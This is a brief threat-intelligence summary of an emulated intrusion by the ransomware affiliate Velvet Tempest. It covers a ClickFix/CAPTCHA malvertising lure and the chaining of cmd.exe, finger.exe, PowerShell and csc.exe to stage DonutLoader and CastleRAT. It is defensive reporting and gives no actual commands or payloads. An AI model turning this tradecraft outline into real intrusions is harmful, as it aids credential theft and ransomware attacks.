Researchers at MalBeacon observed Velvet Tempest use a ClickFix malvertising lure and legitimate Windows utilities to stage DonutLoader and retrieve the CastleRAT backdoor during a 12‑day emulated intrusion. After initial access via a ClickFix/CAPTCHA trick that prompted victims to paste an obfuscated Run command, operators used nested cmd.exe chains, finger.exe, PowerShell, csc.exe compilation, and Python persistence to harvest credentials and deploy loaders. #VelvetTempest #CastleRAT
Keypoints
- MalBeacon observed the intrusion over 12 days in an emulated U.S. non‑profit environment with over 3,000 endpoints.
- Initial access was achieved via a malvertising ClickFix/CAPTCHA scheme that instructed victims to paste an obfuscated command into the Windows Run dialog.
- Operators leveraged legitimate Windows tools (cmd.exe, finger.exe, PowerShell, csc.exe) to fetch, compile, and execute additional payloads.
- The campaign staged DonutLoader and retrieved the CastleRAT backdoor, a RAT linked to CastleLoader and information stealers like LummaStealer.
- Velvet Tempest (DEV‑0504) is a long‑running ransomware affiliate tied to multiple strains, though Termite ransomware was not deployed in this observed intrusion.